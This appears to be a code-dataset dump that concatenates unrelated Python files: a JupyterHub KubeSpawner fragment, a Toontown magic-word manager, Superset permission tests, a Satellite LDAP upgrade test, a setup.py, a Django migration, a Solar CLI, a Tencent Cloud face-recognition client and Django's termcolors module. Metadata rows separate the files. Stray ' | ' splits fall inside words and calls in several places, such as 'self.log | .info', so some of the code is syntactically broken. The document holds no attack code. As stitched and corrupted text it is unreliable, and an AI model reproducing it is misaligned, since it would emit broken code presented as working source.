from .traitlets import Callable
class PodReflector(ResourceReflector):
"""
PodReflector is merely a configured ResourceReflector. It exposes
the pods property, which is simply mapping to self.resources where the
ResourceReflector keeps an updated list of the resource defined by
the `kind` field and the `list_method_name` field.
"""
kind = "pods"
# The default component label can be over-ridden by specifying the component_label property
labels = {
'component': 'singleuser-server',
}
@property
def pods(self):
"""
A dictionary of pods for the namespace as returned by the Kubernetes
API. The dictionary keys are the pod ids and the values are
dictionaries of the actual pod resource values.
ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#pod-v1-core
"""
return self.resources
class EventReflector(ResourceReflector):
"""
EventsReflector is merely a configured ResourceReflector. It
exposes the events property, which is simply mapping to self.resources where
the ResourceReflector keeps an updated list of the resource
defined by the `kind` field and the `list_method_name` field.
"""
kind = "events"
@property
def events(self):
"""
Returns list of dictionaries representing the k8s
events within the namespace, sorted by the latest event.
ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#event-v1-core
"""
# NOTE:
# - self.resources is a dictionary with keys mapping unique ids of
# Kubernetes Event resources, updated by ResourceReflector.
# self.resources will builds up with incoming k8s events, but can also
# suddenly refreshes itself entirely. We should not assume a call to
# this dictionary's values will result in a consistently ordered list,
# so we sort it to get it somewhat more structured.
# - We either seem to get only event['lastTimestamp'] or
# event['eventTime'], both fields serve the same role but the former
# is a low resolution timestamp without and the other is a higher
# resolution timestamp.
return sorted(
self.resources.values(),
key=lambda event: event["lastTimestamp"] or event["eventTime"],
)
class MockObject(object):
pass
class KubeSpawner(Spawner):
"""
A JupyterHub spawner that spawn pods in a Kubernetes Cluster. Each server
spawned by a user will have its own KubeSpawner instance.
"""
reflectors = {
"pods": None,
"events": None,
}
# Characters as defined by safe for DNS
# Note: '-' is not in safe_chars, as it is being used as escape character
safe_chars = set(string.ascii_lowercase + string.digits)
@property
def pod_reflector(self):
"""
A convenience alias to the class variable reflectors['pods'].
"""
return self.__class__.reflectors['pods']
@property
def event_reflector(self):
"""
A convenience alias to the class variable reflectors['events'] if the
spawner instance has events_enabled.
"""
if self.events_enabled:
return self.__class__.reflectors['events']
def __init__(self, *args, **kwargs):
_mock = kwargs.pop('_mock', False)
super().__init__(*args, **kwargs)
if _mock:
# runs during test execution only
if 'user' not in kwargs:
user = MockObject()
user.name = 'mock_name'
user.id = 'mock_id'
user.url = 'mock_url'
self.user = user
if 'hub' not in kwargs:
hub = MockObject()
hub.public_host = 'mock_public_host'
hub.url = 'mock_url'
hub.base_url = 'mock_base_url'
hub.api_url = 'mock_api_url'
self.hub = hub
# We have to set the namespace (if user namespaces are enabled)
# b | efore we start the reflectors, so this must run before
# watcher start in normal execution. We still want to get the
# namespace right for test, though, so we need self.user to have
# been set in order to do that.
# By now, all the traitlets have been set, so we can use them to
# compute other attributes
if self.enable_user_namespaces:
self.namespace = self._expand_user_properties(self.user_namespace_template)
self.log | .info("Using user namespace: {}".format(self.namespace))
self.pod_name = self._expand_user_properties(self.pod_name_template)
self.dns_name = self.dns_name_template.format(
namespace=self.namespace, name=self.pod_name
)
self.secret_name = self._expand_user_properties(self.secret_name_template)
self.pvc_name = self._expand_user_properties(self.pvc_name_template)
if self.working_dir:
self.working_dir = self._expand_user_properties(self.working_dir)
if self.port == 0:
# Our default port is 8888
self.port = 8888
# The attribute needs to exist, even though it is unset to start with
self._start_future = None
load_config(host=self.k8s_api_host, ssl_ca_cert=self.k8s_api_ssl_ca_cert)
self.api = shared_client("CoreV1Api")
self._start_watching_pods()
if self.events_enabled:
self._start_watching_events()
def _await_pod_reflector(method):
"""Decorator to wait for pod reflector to load
Apply to methods which require the pod reflector
to have completed its first load of pods.
"""
@wraps(method)
async def async_method(self, *args, **kwargs):
if not self.pod_reflector.first_load_future.done():
await self.pod_reflector.first_load_future
return await method(self, *args, **kwargs)
return async_method
def _await_event_reflector(method):
"""Decorator to wait for event reflector to load
Apply to methods which require the event reflector
to have completed its first load of events.
"""
@wraps(method)
async def async_method(self, *args, **kwargs):
if (
self.events_enabled
and not self.event_reflector.first_load_future.done()
):
await self.event_reflector.first_load_future
return await method(self, *args, **kwargs)
return async_method
k8s_api_ssl_ca_cert = Unicode(
"",
config=True,
help="""
Location (absolute filepath) for CA certs of the k8s API server.
Typically |
ToonTownInfiniteRepo/ToontownInfinite | otp/ai/MagicWordManagerAI.py | Python | mit | 1,950 | 0.004615 | from direct.directnotify import DirectNotifyGlobal
from direct.distributed.DistributedObjectAI import DistributedObjectAI
from otp.ai.MagicWordGlobal import *
from direct.distributed.PyDatagram import PyDatagram
from direct.distributed.MsgTypes import *
class MagicWordManagerAI(DistributedObjectAI):
notify = DirectNotifyGlobal.directNotify.newCategory("MagicWordManagerAI")
def sendMagicWord(self, word, targetId):
invokerId = self.air.getAvatarIdFromSender()
invoker = self.air.doId2do.get(invokerId)
if not 'DistributedToonAI' in str(self.air.doId2do.get(targetId)):
self.sendUpdateToAvatarId(invokerId, 'sendMagicWordResponse', ['Target is not a toon object!'])
return
if not invoker:
self.sendUpdateToAvatarId(invokerId, 'sendMagicWordResponse', ['missing invoker'])
return
if invoker.getAdminAccess() < MINIMUM_MAGICWORD_ACCESS:
self.air.writeServerEvent('suspicious', invokerId, 'Attempted to issue magic word: %s' % word)
dg = PyDatagram()
dg.addServerHeader(self.GetPuppetConnectionChannel(invokerId), self.air.ourChannel, CLIENTAGENT_EJECT)
dg.addUint16(126)
dg.addString('Magic Words are reserved for administrators only!')
self.air.send(dg)
return
target = self.air.doId2do.get(targetId)
if not target:
self.sendUpdateToAvatarId(invokerId, 'sendMagicWordResponse', ['missing target'])
return
response = spellbook.process(invoker, target, word)
if response:
self.sendUpdateToAvatarId(invokerId, 'sendMagicWordResponse', [response])
self.air.writeServerEvent('magic-word',
invokerId, invoker.getAdminAccess( | ),
targetId, target.getAdminAccess(),
wor | d, response)
|
alanmcruickshank/superset-dev | tests/security_tests.py | Python | apache-2.0 | 7,916 | 0.000126 | from superset import security, sm
from .base_tests import SupersetTestCase
def get_perm_tuples(role_name):
perm_set = set()
for perm in sm.find_role(role_name).permissions:
perm_set.add((perm.permission.name, perm.view_menu.name))
return perm_set
class RolePermissionTests(SupersetTestCase):
"""Testing export import functionality for dashboards"""
def __init__(self, *args, **kwargs):
super(RolePermissionTests, self).__init__(*args, **kwargs)
def assert_can_read(self, view_menu, permissions_set):
self.assertIn(('can_show', view_menu), permissions_set)
self.assertIn(('can_list', view_menu), permissions_set)
def assert_can_write(self, view_menu, permissions_set):
self.assertIn(('can_add', view_menu), permissions_set)
self.assertIn(('can_download', view_menu), permissions_set)
self.assertIn(('can_delete', view_menu), permissions_set)
self.assertIn(('can_edit', view_menu), permissions_set)
def assert_cannot_write(self, view_menu, permissions_set):
self.assertNotIn(('can_add', view_menu), permissions_set)
self.assertNotIn(('can_download', view_menu), permissions_set)
self.assertNotIn(('can_delete', view_menu), permissions_set)
self.assertNotIn(('can_edit', view_menu), permissions_set)
self.assertNotIn(('can_save', view_menu), permissions_set)
def assert_can_all(self, view_menu, permissions_set):
self.assert_can_read(view_menu, permissions_set)
self.assert_can_write(view_menu, permissions_set)
def assert_cannot_gamma(self, perm_set):
self.assert_cannot_write('DruidColumnInlineView', perm_set)
def assert_can_gamma(self, perm_set):
self.assert_can_read('DatabaseAsync', perm_set)
self.assert_can_read('TableModelView', perm_set)
# make sure that user can create slices and dashboards
self.assert_can_all('SliceModelView', perm_set)
self.assert_can_all('DashboardModelView', perm_set)
self.assertIn(('can_add_slices', 'Superset'), perm_set)
self.assertIn(('can_copy_dash', 'Superset'), perm_set)
self.assertIn(('can_activity_per_day', 'Superset'), perm_set)
self.assertIn(('can_created_dashboards', 'Superset'), perm_set)
self.assertIn(('can_created_slices', 'Superset'), perm_set)
self.assertIn(('can_csv', 'Superset'), perm_set)
self.assertIn(('can_dashboard', 'Superset'), perm_set)
self.assertIn(('can_explore', 'Superset'), perm_set)
self.assertIn(('can_explore_json', 'Superset'), perm_set)
self.assertIn(('can_fave_dashboards', 'Superset'), perm_set)
self.assertIn(('can_fave_slices', 'Superset'), perm_set)
self.assertIn(('can_save_dash', 'Superset'), perm_set)
self.assertIn(('can_slice', 'Superset'), perm_set)
self.assertIn(('can_explore', 'Superset'), perm_set)
self.assertIn(('can_explore_json', 'Superset'), perm_set)
def assert_can_alpha(self, perm_set):
self.assert_can_all('SqlMetricInlineView', perm_set)
self.assert_can_all('TableColumnInlineView', perm_set)
self.assert_can_all('TableModelView', perm_set)
self.assert_can_all('DruidColumnInlineView', perm_set)
self.assert_can_all('DruidDatasourceModelView', perm_set)
self.assert_can_all('DruidMetricInlineView', perm_set)
self.assertIn(
('all_datasource_access', 'all_datasource_access'), perm_set)
self.assertIn(('muldelete', 'DruidDatasourceModelView'), perm_set)
def assert_cannot_alpha(self, perm_set):
self.assert_cannot_write('AccessRequestsModelView', perm_set)
self.assert_cannot_write('Queries', perm_set)
self.assert_cannot_write('RoleModelView', perm_set)
self.assert_cannot_write('UserDBModelView', perm_set)
def assert_can_admin(self, perm_set):
self.assert_can_all('DatabaseAsync', perm_set)
self.assert_can_all('DatabaseView', perm_set)
self.assert_can_all('DruidClusterModelView', perm_set)
self.assert_can_all('AccessRequestsModelView', perm_set)
self.assert_can_all('RoleModelView', perm_set)
self.assert_can_all('UserDBModelView', perm_set)
self.assertIn(('all_database_access', 'all_database_access'), perm_set)
self.assertIn(('can_override_role_permissions', 'Superset'), perm_set)
self.assertIn(('can_sync_druid_source', 'Superset'), perm_set)
self.assertIn(('can_override_role_permissions', 'Superset'), perm_set)
self.assertIn(('can_approve', 'Superset'), perm_set)
self.assertIn(('can_update_role', 'Superset'), perm_set)
def test_is_admin_only(self):
self.assertFalse(security.is_admin_only(
sm.find_permission_view_menu('can_show', 'TableModelView')))
self.assertFalse(security.is_admin_only(
sm.find_permission_view_menu(
'all_datasource_access', 'all_datasource_access')))
self.assertTrue(security.is_admin_only(
sm.find_permission_view_menu('can_delete', 'DatabaseView')))
self.assertTrue(security.is_admin_only(
sm.find_permission_view_menu(
'can_show', 'AccessRequestsModelView')))
self.assertTrue(security.is_admin_only(
| sm.find_permission_view_menu(
'can_edit', 'UserDBModelView')))
self.assertTrue(security.is_admin_only(
sm.find_permission_view_menu(
'can_approve', 'Superset')))
self.assertTrue(security.is_admin_only(
sm.find_permission_view_menu(
'all_database_access', 'all_database_access') | ))
def test_is_alpha_only(self):
self.assertFalse(security.is_alpha_only(
sm.find_permission_view_menu('can_show', 'TableModelView')))
self.assertTrue(security.is_alpha_only(
sm.find_permission_view_menu('muldelete', 'TableModelView')))
self.assertTrue(security.is_alpha_only(
sm.find_permission_view_menu(
'all_datasource_access', 'all_datasource_access')))
self.assertTrue(security.is_alpha_only(
sm.find_permission_view_menu('can_edit', 'SqlMetricInlineView')))
self.assertTrue(security.is_alpha_only(
sm.find_permission_view_menu(
'can_delete', 'DruidMetricInlineView')))
def test_is_gamma_pvm(self):
self.assertTrue(security.is_gamma_pvm(
sm.find_permission_view_menu('can_show', 'TableModelView')))
def test_gamma_permissions(self):
self.assert_can_gamma(get_perm_tuples('Gamma'))
self.assert_cannot_gamma(get_perm_tuples('Gamma'))
self.assert_cannot_alpha(get_perm_tuples('Alpha'))
def test_alpha_permissions(self):
self.assert_can_gamma(get_perm_tuples('Alpha'))
self.assert_can_alpha(get_perm_tuples('Alpha'))
self.assert_cannot_alpha(get_perm_tuples('Alpha'))
def test_admin_permissions(self):
self.assert_can_gamma(get_perm_tuples('Admin'))
self.assert_can_alpha(get_perm_tuples('Admin'))
self.assert_can_admin(get_perm_tuples('Admin'))
def test_sql_lab_permissions(self):
sql_lab_set = get_perm_tuples('sql_lab')
self.assertIn(('can_sql_json', 'Superset'), sql_lab_set)
self.assertIn(('can_csv', 'Superset'), sql_lab_set)
self.assertIn(('can_search_queries', 'Superset'), sql_lab_set)
self.assert_cannot_gamma(sql_lab_set)
self.assert_cannot_alpha(sql_lab_set)
def test_granter_permissions(self):
granter_set = get_perm_tuples('granter')
self.assertIn(('can_override_role_permissions', 'Superset'), granter_set)
self.assertIn(('can_approve', 'Superset'), granter_set)
self.assert_cannot_gamma(granter_set)
self.assert_cannot_alpha(granter_set)
|
SatelliteQE/robottelo | tests/upgrades/test_usergroup.py | Python | gpl-3.0 | 3,681 | 0.002173 | """Test for User Group related Upgrade Scenario's
:Requirement: UpgradedSatellite
:CaseAutomation: Automated
:CaseLevel: Acceptance
:CaseComponent: UsersRoles
:Assignee: sganar
:TestType: Functional
:CaseImportance: High
:Upstream: No
"""
import pytest
from nailgun import entities
from nailgun.config import ServerConfig
from requests.exceptions import HTTPError
from robottelo.config import settings
from robottelo.constants import LDAP_ATTR
from robottelo.constants import LDAP_SERVER_TYPE
class TestUserGroupMembership:
"""
Usergroup membership should exist after upgrade.
"""
@pytest.mark.pre_upgrade
def test_pre_create_usergroup_with_ldap_user(self, request, default_sat):
"""Create Usergroup in preupgrade version.
:id: preupgrade-4b11d883-f523-4f38-b65a-650ecd90335c
:steps:
1. Create ldap auth pre upgrade.
2. Login with ldap User in satellite and logout.
3. Create usergroup and assign ldap user to it.
:expectedresults: The usergroup, with ldap user as member, should be created successfully.
"""
authsource = default_sat.api.AuthSourceLDAP(
onthefly_register=True,
account=settings.ldap.username,
account_password=settings.ldap.password,
base_dn=settings.ldap.basedn,
groups_base=settings.ldap.grpbasedn,
attr_firstname=LDAP_ATTR['firstname'],
attr_lastname=LDAP_ATTR['surname'],
attr_login=LDAP_ATTR['login_ad'],
server_type=LDAP_SERVER_TYPE['API']['ad'],
attr_mail=LDAP_ATTR['mail'],
name=request.node.name + "_server",
host=settings.ldap.hostname,
tls=False,
port='389',
).create()
assert authsource.name == request.node.name + "_server"
sc = ServerConfig(
auth=(settings.ldap.username, settings.ldap.password),
url=default_sat.url,
verify=False,
)
with pytest.raises(HTTPError):
entities.User(sc).search()
user_group = default_sat.api.UserGroup(name=request.node.name + "_user_group").create()
user = default_sat.api.User().search(query={'search': f'login={settings.ldap.username}'})[0]
user_group.user = [user]
user_group = user_group.update(['user'])
assert user.login == user_group.user[0].read().login
@pytest.mark.post_upgrade(depend_on=test_ | pre_create_usergroup_with_ldap_user)
def test_post_verify_usergroup_membership(self, request, dependent_scenario_name):
| """After upgrade, check the LDAP user created before the upgrade still exists and its
update functionality should work.
:id: postupgrade-7545fc6a-bd57-4403-90c8-c68a7a3b5bca
:steps:
1. verify ldap user(created before upgrade) is part of user group.
2. Update ldap auth.
:expectedresults: After upgrade, user group membership should remain the same and LDAP
auth update should work.
"""
pre_test_name = dependent_scenario_name
user_group = entities.UserGroup().search(
query={'search': f'name={pre_test_name}_user_group'}
)
authsource = entities.AuthSourceLDAP().search(
query={'search': f'name={pre_test_name}_server'}
)[0]
request.addfinalizer(authsource.delete)
request.addfinalizer(user_group[0].delete)
user = entities.User().search(query={'search': f'login={settings.ldap.username}'})[0]
request.addfinalizer(user.delete)
assert user.read().id == user_group[0].read().user[0].id
|
oinopion/hurl | setup.py | Python | bsd-3-clause | 827 | 0 | from distutils.core import setup
from os import path
ROOT = path.dirname(__file__)
README = path.join(ROOT, 'README.rst')
setup(
name='hurl',
py_modules=['hurl'],
url=' | https://github.com/oinopion/hurl',
author='Tomek Paczkowski & Aleksandra Sendecka',
author_email='tomek@hauru.eu',
version='2.1',
license='New BSD License',
long_description=open(README).read(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
| 'Operating System :: OS Independent',
'Framework :: Django',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
|
chrisfilo/NeuroVault | neurovault/apps/statmaps/migrations/0027_auto_20150220_0305.py | Python | mit | 1,314 | 0.001522 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('statmaps', '0026_populate_cogatlas'),
]
operations = [
migrati | ons.AddField(
model_name='statisticmap',
name='cognitive_paradigm_cogatlas',
field=models.CharField(help_text=b"Task (or lack of it) performed by the subjects in the scanner described using <a href='http://www.cognitiveatlas.org/'>Cognitive Atlas</a> terms", max_length=200, null=True, verbose_name=b'Cognitive Paradigm'),
preserve_default=True,
),
migrations.AlterField(
model_name='statisticmap',
name='mod | ality',
field=models.CharField(help_text=b'Brain imaging procedure that was used to acquire the data.', max_length=200, verbose_name=b'Modality & Acquisition Type', choices=[(b'fMRI-BOLD', b'fMRI-BOLD'), (b'fMRI-CBF', b'fMRI-CBF'), (b'fMRI-CBV', b'fMRI-CBV'), (b'Diffusion MRI', b'Diffusion MRI'), (b'Structural MRI', b'Structural MRI'), (b'PET FDG', b'PET FDG'), (b'PET [15O]-water', b'PET [15O]-water'), (b'PET other', b'PET other'), (b'MEG', b'MEG'), (b'EEG', b'EEG'), (b'Other', b'Other')]),
preserve_default=True,
),
]
|
dshulyak/solar | solar/solar/cli/system_log.py | Python | apache-2.0 | 2,234 | 0.000895 |
import sys
import click
from solar.core import testing
from solar.core import resource
from solar.system_log import change
from solar.system_log import operations
from solar.system_log import data
from solar.cli.uids_history import get_uid, remember_uid, SOLARUID
@click.group()
def changes():
pass
@changes.command()
def validate():
errors = resource.validate_resources()
if errors:
for r, error in errors:
print 'ERROR: %s: %s' % (r.name, error)
sys.exit(1)
@changes.command()
@click.option('-d', default=False, is_flag=True)
def stage(d):
log = list(change.stage_changes().reverse())
for item in log:
click.echo(item)
if d:
for line in item.details:
click.echo(' '*4+line)
if not log:
click.echo('No changes')
@changes.command(name='staged-item')
@click.argument('log_action')
def staged_item(log_action):
item = data.SL().get(log_action)
if not item:
click.echo('No staged changes for {}'.format(log_action))
else:
click.echo(item)
for line in item.details:
click.echo(' '*4+line)
@changes.command()
def process():
uid = change.send_to_orchestration()
remember_uid(uid)
click.echo(uid)
@changes.command()
@click.argument('uid', type=SOLARUID)
def commit(uid):
operations.commit(uid)
@changes.command()
@click.option('-n', default=5)
def history(n):
commited = list(data.CL().collection(n))
if not commited:
click.echo('No history.')
re | turn
commited.reverse()
click.echo(commited)
@changes.command()
def test():
results = testing.test_all()
for name, result in results.items():
msg = '[{status}] {name} {message}'
kwargs = {
'name': name,
'message': '',
'status': 'OK',
}
if result['status'] == 'ok':
kwargs['status'] | = click.style('OK', fg='green')
else:
kwargs['status'] = click.style('ERROR', fg='red')
kwargs['message'] = result['message']
click.echo(msg.format(**kwargs))
@changes.command(name='clean-history')
def clean_history():
data.CL().clean()
data.CD().clean()
|
tzpBingo/github-trending | codespace/python/tencentcloud/iai/v20200303/iai_client.py | Python | mit | 65,319 | 0.002484 | # -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException
from tencentcloud.common.abstract_client import AbstractClient
from tencentcloud.iai.v20200303 import models
class IaiClient(AbstractClient):
_apiVersion = '2020-03-03'
_endpoint = 'iai.tencentcloudapi.com'
_service | = 'iai'
def AnalyzeDenseLandmarks(self, request):
"""对请求图片进行五官定位(也称人脸关键点定位),获得人脸的精准信息,返回多达888点关键信息,对五官和脸部轮廓进行精确定位。
:param request: Request instance for AnalyzeDenseLandmarks.
:type request: :class:`tencentcloud.iai.v20200303.models.AnalyzeDenseLandmarksR | equest`
:rtype: :class:`tencentcloud.iai.v20200303.models.AnalyzeDenseLandmarksResponse`
"""
try:
params = request._serialize()
body = self.call("AnalyzeDenseLandmarks", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.AnalyzeDenseLandmarksResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def AnalyzeFace(self, request):
"""对请求图片进行五官定位(也称人脸关键点定位),计算构成人脸轮廓的 90 个点,包括眉毛(左右各 8 点)、眼睛(左右各 8 点)、鼻子(13 点)、嘴巴(22 点)、脸型轮廓(21 点)、眼珠[或瞳孔](2点)。
>
- 公共参数中的签名方式请使用V3版本,即配置SignatureMethod参数为TC3-HMAC-SHA256。
:param request: Request instance for AnalyzeFace.
:type request: :class:`tencentcloud.iai.v20200303.models.AnalyzeFaceRequest`
:rtype: :class:`tencentcloud.iai.v20200303.models.AnalyzeFaceResponse`
"""
try:
params = request._serialize()
body = self.call("AnalyzeFace", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.AnalyzeFaceResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CheckSimilarPerson(self, request):
"""对指定的人员库进行人员查重,给出疑似相同人的信息。
可以使用本接口对已有的单个人员库进行人员查重,避免同一人在单个人员库中拥有多个身份;也可以使用本接口对已有的多个人员库进行人员查重,查询同一人是否同时存在多个人员库中。
不支持跨算法模型版本查重,且目前仅支持算法模型为3.0的人员库使用查重功能。
>
- 若对完全相同的指定人员库进行查重操作,需等待上次操作完成才可。即,若两次请求输入的 GroupIds 相同,第一次请求若未完成,第二次请求将返回失败。
>
- 查重的人员库状态为腾讯云开始进行查重任务的那一刻,即您可以理解为当您发起查重请求后,若您的查重任务需要排队,在排队期间您对人员库的增删操作均会会影响查重的结果。腾讯云将以开始进行查重任务的那一刻人员库的状态进行查重。查重任务开始后,您对人员库的任何操作均不影响查重任务的进行。但建议查重任务开始后,请不要对人员库中人员和人脸进行增删操作。
:param request: Request instance for CheckSimilarPerson.
:type request: :class:`tencentcloud.iai.v20200303.models.CheckSimilarPersonRequest`
:rtype: :class:`tencentcloud.iai.v20200303.models.CheckSimilarPersonResponse`
"""
try:
params = request._serialize()
body = self.call("CheckSimilarPerson", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CheckSimilarPersonResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CompareFace(self, request):
"""对两张图片中的人脸进行相似度比对,返回人脸相似度分数。
若您需要判断 “此人是否是某人”,即验证某张图片中的人是否是已知身份的某人,如常见的人脸登录场景,建议使用[人脸验证](https://cloud.tencent.com/document/product/867/44983)或[人员验证](https://cloud.tencent.com/document/product/867/44982)接口。
>
- 公共参数中的签名方式请使用V3版本,即配置SignatureMethod参数为TC3-HMAC-SHA256。
:param request: Request instance for CompareFace.
:type request: :class:`tencentcloud.iai.v20200303.models.CompareFaceRequest`
:rtype: :class:`tencentcloud.iai.v20200303.models.CompareFaceResponse`
"""
try:
params = request._serialize()
body = self.call("CompareFace", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CompareFaceResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CompareMaskFace(self, request):
"""对两张图片中的人脸进行相似度比对,返回人脸相似度分数。
戴口罩人脸比对接口可在人脸戴口罩情况下使用,口罩遮挡程度最高可以遮挡鼻尖。
如图片人脸不存在戴口罩情况,建议使用人脸比对服务。
:param request: Request instance for CompareMaskFace.
:type request: :class:`tencentcloud.iai.v20200303.models.CompareMaskFaceRequest`
:rtype: :class:`tencentcloud.iai.v20200303.models.CompareMaskFaceResponse`
"""
try:
params = request._serialize()
body = self.call("CompareMaskFace", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CompareMaskFaceResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CopyPerson(self, request):
"""将已存在于某人员库的人员复制到其他人员库,该人员的描述信息不会被复制。单个人员最多只能同时存在100个人员库中。
>
- 注:若该人员创建时算法模型版本为2.0,复制到非2.0算法模型版本的Group中时,复制操作将会失败。
:param request: Request instance for CopyPerson.
:type request: :class:`tencentcloud.iai.v20200303.models.CopyPersonRequest`
:rtype: :class:`tencentcloud.iai.v20200303.models.CopyPersonResponse`
"""
try:
params = request._serialize()
body = self.cal |
yceruto/django | django/utils/termcolors.py | Python | bsd-3-clause | 7,357 | 0.00068 | """
termcolors.py
"""
from django.utils import six
color_names = ('black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white')
foreground = dict((color_names[x], '3%s' % x) for x in range(8))
background = dict((color_names[x], '4%s' % x) for x in range(8))
RESET = '0'
opt_dict = {'bold': '1', 'underscore': '4', 'blink': '5', 'reverse': '7', 'conceal': '8'}
def colorize(text='', opts=(), **kwargs):
"""
Returns your text, enclosed in ANSI graphics codes.
Depends on the keyword arguments 'fg' and 'bg', and the contents of
the opts tuple/list.
Returns the RESET code if no parameters are given.
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold'
'underscore'
'blink'
'reverse'
'conceal'
'noreset' - string will not be auto-terminated with the RESET code
Examples:
colorize('hello', fg='red', bg='blue', opts=('blink',))
colorize()
colorize('goodbye', opts=('underscore',))
print(colorize('first line', fg='red', opts=('noreset',)))
print('this should be red too')
print(colorize('and so should this'))
print('this should not be red')
"""
code_list = []
if text == '' and len(opts) == 1 and opts[0] == 'reset':
return '\x1b[%sm' % RESET
for k, v in six.iteritems(kwargs):
if k == 'fg':
code_list.append(foreground[v])
elif k == 'bg':
code_list.append(background[v])
for o in opts:
if o in opt_dict:
code_list.append(opt_dict[o])
if 'noreset' not in opts:
text = '%s\x1b[%sm' % (text or '', RESET)
return '%s%s' % (('\x1b[%sm' % ';'.join(code_list)), text or '')
def make_style(opts=(), **kwargs):
"""
Returns a function with default parameters for colorize()
Example:
bold_red = make_style(opts=('bold',), fg='red')
print(bold_red('hello'))
KEYWORD = make_style(fg='yellow')
COMMENT = make_style(fg='blue', opts=('bold',))
"""
return lambda text: colorize(text, opts, **kwargs)
NOCOLOR_PALETTE = 'nocolor'
DARK_PALETTE = 'dark'
LIGHT_PALETTE = 'light'
PALETTES = {
NOCOLOR_PALETTE: {
'ERROR': {},
'NOTICE': {},
'SQL_FIELD': {},
'SQL_COLTYPE': {},
'SQL_KEYWORD': {},
'SQL_TABLE': {},
'HTTP_INFO': {},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {},
'HTTP_NOT_MODIFIED': {},
'HTTP_BAD_REQUEST': {},
'HTTP_NOT_FOUND': {},
'HTTP_SERVER_ERROR': {},
'MIGRATE_HEADING': {},
'MIGRATE_LABEL': {},
'MIGRATE_SUCCESS': {},
'MIGRATE_FAILURE': {},
},
DARK_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'yellow'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green'},
'HTTP_NOT_MODIFIED': {'fg': 'cyan'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'yellow'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
'MIGRATE_SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'MIGRATE_FAILURE': {'fg': 'red', 'opts': ('bold',)},
},
LIGHT_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'blue'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green', 'opts': ('bold',)},
'HTTP_NOT_MODIFIED': {'fg': 'green'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'red'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
'MIGRATE_SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'MIGRATE_FAILURE': {'fg': 'red', 'opts': ('bold',)},
}
}
